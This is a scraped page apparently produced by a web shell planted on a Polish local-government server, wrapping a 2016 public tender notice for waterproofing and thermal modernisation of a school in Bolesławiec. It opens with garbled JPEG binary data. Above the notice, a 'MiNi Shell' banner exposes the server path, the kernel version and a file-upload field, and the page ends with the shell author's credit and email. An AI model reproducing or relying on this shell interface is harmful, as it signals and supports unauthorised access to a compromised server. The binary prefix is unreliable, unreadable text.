JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160401/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160401/73644-N-2016.html

<p class="kh_header"><b>Bolesławiec: Kompleksowe odwodnienie terenu wokół budynku 
Zespołu Szkół Mechanicznych im. L. Waryńskiego w Bolesławcu, 
wykonanie izolacji pionowej ścian zewnętrznych 
wraz z termomodernizacją budynku szkoły - II etap</b><br>
<b>Numer ogłoszenia: 73644 - 2016; data zamieszczenia: 01.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Bolesławiecki , pl. Marszałka Józefa Piłsudskiego 2, 59-700 Bolesławiec, woj. dolnośląskie, tel. 75 732 3258, faks 75 732 3250.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.powiatboleslawiecki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowe odwodnienie terenu wokół budynku 
Zespołu Szkół Mechanicznych im. L. Waryńskiego w Bolesławcu, 
wykonanie izolacji pionowej ścian zewnętrznych 
wraz z termomodernizacją budynku szkoły - II etap.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia obejmuje roboty budowlane polegające na wykonaniu hydroizolacji oraz termomodernizacji budynku Zespołu Szkół Mechanicznych im. L. Waryńskiego 
w Bolesławcu w związku z realizacją inwestycji pn. Kompleksowe odwodnienie terenu wokół budynku Zespołu Szkół Mechanicznych im. L. Waryńskiego w Bolesławcu, wykonanie izolacji pionowej ścian zewnętrznych wraz z termomodernizacją budynku szkoły - II etap, na podstawie dokumentacji projektowej wykonanej przez pracownię projektową ARCHIPROJEKT Włodzimierz Banaś, z siedzibą w Lubinie (59-301) przy ul. M. Skłodowskiej-Curie 88.   
Zamawiający zgłosił właściwemu organowi zamiar wykonania robót budowlanych niewymagających pozwolenia na budowę, na które nie wniesiono sprzeciwu. 

2.	Budynek Zespołu Szkół Mechanicznych im. L. Waryńskiego zlokalizowany jest 
w Bolesławcu przy ul. Górne Młyny 1, na działce nr 1000, obręb 9, miasto Bolesławiec.
3.	Realizacja zamówienia polegać będzie na wykonaniu m.in. następujących robót budowlanych:
1)	zamurowanie zewnętrznego otworu drzwiowego,
2)	termomodernizacja budynku wraz z wykonaniem elewacji - około 1680,00 m2,
3)	ocieplenie połaci dachu na starym skrzydle budynku w obrębie poddasza wraz z wymianą pokrycia dachowego - około 370,00 m2,
4)	ocieplenie dachu wiatrołapu wraz z wymianą pokrycia dachowego - około 22,00 m2,
5)	wymianę okien w pomieszczeniach piwnicznych - 10 szt.,
6)	wykonanie iniekcji wewnętrznych ścian piwnicznych - około 82,00 mb,
7)	remont pomieszczeń piwnicznych po wykonaniu iniekcji (wykonanie tynków renowacyjnych, gładzi gipsowych oraz malowanie pomieszczeń),
8)	wymiana i montaż obróbek blacharskich (ogniomury, pasy nadrynnowe, podokienniki, kołnierze, rynny dachowe, rury spustowe itp.),
9)	wykonanie nowej instalacji odgromowej,
10)	demontaż urządzeń na elewacji (tablice, uchwyty na flagi, oprawy oświetleniowe, okamerowanie, kraty okienne), ponowny montaż urządzeń (okamerowanie) oraz montaż nowych urządzeń, po wykonaniu elewacji (tablice, uchwyty na flagi, oprawy oświetleniowe). 
4.	Wykonawca powinien zrealizować zakres robót określony w:
1)	 Przedmiarze robót - hydroizolacje oraz zagospodarowanie terenu, w części obejmującej pozycję od 1 do 48. Część obejmująca pozycje od 49 do 83 została już zrealizowana i nie należy jej uwzględniać w ofercie.
2)	 Przedmiarze robót - termomodernizacja budynku szkoły.
3)	 Przedmiarze robót - wykonanie instalacji odgromowej.
4)	 Ponadto należy uwzględnić i ująć w ofercie wykonanie następujących robót budowlanych, które nie zostały ujęte w przedmiarach robót:
a)	rozebranie nawierzchni utwardzonych z kostki betonowej i ponowne ułożenie po zakończonych pracach izolacyjnych - około 100,0 m2,
b)	zabezpieczenie przed uszkodzeniem istniejącej kanalizacji deszczowej na odcinku około 60,0 m,
5.	Szczegółowy przedmiot zamówienia określają dokumenty stanowiące załącznik nr 2 do SIWZ tj.:
1)	Dokumentacja projektowa,
2)	Przedmiary,
3)	Mapy, rysunki,
4)	Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych,
5)	Opinia i wytyczne Dolnośląskiego Wojewódzkiego Konserwatora Zabytków we Wrocławiu.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenie zamówień uzupełniających, w przypadku udzielenia,  
w okresie 3 lat od udzielenia zamówienia podstawowego, dotychczasowemu Wykonawcy robót, stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówienia, zgodnych z przedmiotem zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.12.00-0, 45.11.00.00-1, 45.21.00.00-2, 45.26.00.00-7, 45.26.10.00-4, 45.26.12.10-9, 45.26.13.20-3, 45.26.21.00-2, 45.26.21.10-5, 45.26.21.10-8, 45.26.25.22-2, 45.26.25.22-6, 45.32.00.00-6, 45.32.10.00-3, 45.00.00.00-1, 45.41.00.00-4, 45.42.10.00-4, 45.42.10.00-4, 45.41.13.04-4, 45.43.10.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający żąda wniesienia wadium w kwocie 20.000,00 zł. (słownie złotych: dwadzieścia tysięcy 00/100). 
2.	Wadium może być wniesione w formach przewidzianych art. 45 ust. 6 ustawy, tj.:
1)	pieniądzu;
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)	gwarancjach bankowych;
4)	gwarancjach ubezpieczeniowych;
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy 
z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275).
3.	Wadium w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego BGŻ S.A. 02 2030 0045 1110 0000 0159 6980 tytułem Wadium - Kompleksowe odwodnienie terenu wokół budynku Zespołu Szkół Mechanicznych im. L. Waryńskiego w Bolesławcu, 
wykonanie izolacji pionowej ścian zewnętrznych wraz z termomodernizacją budynku szkoły - II etap.
4.	Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
5.	W przypadku wniesienia wadium w formie gwarancji z jej treści musi jednoznacznie wynikać, jaki jest sposób reprezentacji Gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela Gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny 
(z podaniem imienia i nazwiska). Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych 
w art. 46 ust. 4a i 5 ustawy Prawo zamówień publicznych. 
6.	Gwarancja ma być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy: nazwę Wykonawcy, beneficjenta gwarancji (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib, oznaczenie postępowania, określenie (nazwa) przedmiotu postępowania, określenie wierzytelności, która ma być zabezpieczona gwarancją, kwotę gwarancji, termin ważności gwarancji.
7.	Oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć w osobnej kopercie opisanej WADIUM wraz z ofertą. Do oferty należy natomiast załączyć kopię tego dokumentu, potwierdzoną za zgodność z oryginałem przez uprawomocnionego przedstawiciela Wykonawcy.
8.	Wykonawca, który nie wniesie wadium zostanie wykluczony z postępowania, a jego oferta, zostanie uznana za odrzuconą.
9.	Jeżeli wadium zostało wniesione w pieniądzu, Zamawiający zwróci je wraz
z odsetkami wynikającymi z rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek Wykonawcy. 
10.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli zachodzą przesłanki wynikające 
z art. 46 ust. 4a lub ust. 5 ustawy.
11.	Wadium należy wnieść przed upływem terminu składania ofert.
12.	Zamawiający zwraca wadium w trybie i terminach określonych w art. 46 ust. 1, 1a, 2 ustawy.
13.	Zgodnie z art. 46 ust. 3 ustawy Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 2 ustawy, jeżeli 
w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie załączonego Oświadczenia 
o spełnianiu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej dwie roboty budowlane o charakterze ogólnobudowlanym o wartości nie mniejszej niż 250.000,00 zł brutto za  każdą robotę.
Wykonawca nie może sumować wartości kilku robót (zamówień) o mniejszym zakresie dla uzyskania wymaganej wartości porównywalnej.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie załączonego Oświadczenia 
o spełnianiu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, iż dysponuje osobą do pełnienia funkcji kierownika budowy, posiadającą stosowne uprawnienia budowlane 
w specjalności konstrukcyjno-budowlanej;

Zamawiający uzna uprawnienia zdobyte na podstawie przepisów obowiązujących przed wejściem 
w życie ustawy Prawo budowlane oraz właściwych aktów wykonawczych do niniejszej ustawy - 
w oparciu o art. 104 ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (j.t. Dz. U. z 2016 r., poz. 290).

W przypadku specjalistów zagranicznych posiadających uprawnienia wydane poza terytorium Rzeczpospolitej Polskiej wymaga się od Wykonawcy, aby osoby te spełniały odpowiednie warunki opisane w art. 12a ustawy Prawo budowlane.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie załączonego Oświadczenia 
o spełnianiu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Z Wykonawcą, który złożył najkorzystniejszą ofertę zostanie podpisania umowa, której wzór stanowi załącznik nr 3 do siwz.
2.	Zamawiający przewiduje możliwość dokonania zmian postanowień umowy w stosunku do treści oferty, na podstawie której dokonany będzie wybór Wykonawcy. Wszelkie zmiany 
i uzupełnienia treści umowy wymagają formy pisemnej, pod rygorem nieważności.
3.	Zamawiający określa następujące warunki, w jakich przewiduje możliwość dokonania  zmian zawartej umowy:
1)	na wniosek Wykonawcy dopuszczalna jest zmiana terminu wykonania umowy na okres uwzględniający liczbę dni opóźnienia, spowodowanego występowaniem dłużej niż przez 10 kolejnych dni niekorzystnych warunków atmosferycznych uniemożliwiających wykonywanie robót,  fakt ten winien być potwierdzony wpisem do dziennika budowy;
2)	z przyczyn niezależnych od Zamawiającego, tj. z powodu nadzwyczajnych zdarzeń gospodarczych, których Zamawiający nie mógł przewidzieć w chwili zawarcia umowy;
3)	konieczność zmiany terminu umownego i harmonogramu realizacji robót z powodu: 
a)	konieczności wykonania dodatkowych badań, ekspertyz, analiz itp.
b)	konieczności wykonania prac wynikających z zaleceń organów uprawnionych, np.   Inspektora Nadzoru Budowlanego itp.,
c)	 wystąpienia opóźnienia przekazania terenu budowy Wykonawcy z winy  Zamawiającego,
d)	wystąpienia opóźnień w rozpoczęciu czynności odbiorowych z powodów nie leżących po stronie Wykonawcy,
e)	wystąpienia sytuacji niemożliwej do przewidzenia, której rozwiązanie jest korzystne dla Zamawiającego i bezpośrednio wpływa na koszty i/lub termin zakończenia budowy,
f)	w powyższych przypadkach zmiany terminu wykonania umowy uzależnione będą od czasu trwania zdarzenia powodującego wstrzymanie robót podstawowych.
4)	Zmiana harmonogramu rzeczowo-finansowego nie wymaga zmiany umowy, lecz jedynie pisemnej akceptacji Zamawiającego.
5)	Zmiana formy zabezpieczenia należytego wykonania umowy nie wymaga zmiany umowy, lecz jedynie pisemnej akceptacji Zamawiającego.
6)	Wykonawca może dokonać zmian osób, pełniących funkcje kierownicze na budowie 
 z zachowaniem właściwych kwalifikacji zawodowych. Zmiana taka nie wymaga zmiany umowy, lecz jedynie akceptacji Zamawiającego.
7)	Wykonawca nie będzie uprawniony do przedłużenia terminu wykonania  umowy, jeżeli zmiana jest wymuszona uchybieniem czy naruszeniem umowy przez Wykonawcę.
8)	Zamawiający dopuszcza zmianę podwykonawców lub/i części wykonywanych przez nich robót, bądź wprowadzenia nowego podwykonawcy. Zmiana taka nie wymaga zmiany umowy, lecz jedynie akceptacji Zamawiającego.
4.	W przypadku żądania przedłużenia terminu umownego z przyczyn niezależnych od     Zamawiającego zostanie przeprowadzona następująca procedura:
a)	Wykonawca prześle Zamawiającemu projekt zmian do umowy (aneks) w terminie co   najmniej 10 dni przed datą upływu terminu zakończenia umowy z pisemnym uzasadnieniem.
b)	Zamawiający udzieli pisemnej odpowiedzi lub odeśle podpisany aneks do umowy przed upływem terminu wykonania umowy.
5.	Warunkiem dokonania zmian postanowień umowy jest zgoda obu stron wyrażona na piśmie pod rygorem nieważności takiej zmiany w formie aneksu do umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiatboleslawiecki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Bolesławcu, ul. Armii Krajowej 12, 59-700 Bolesławiec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.04.2016 godzina 11:00, miejsce: Starostwo Powiatowe w Bolesławcu, ul. Armii Krajowej 12, 59-700 Bolesławiec.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com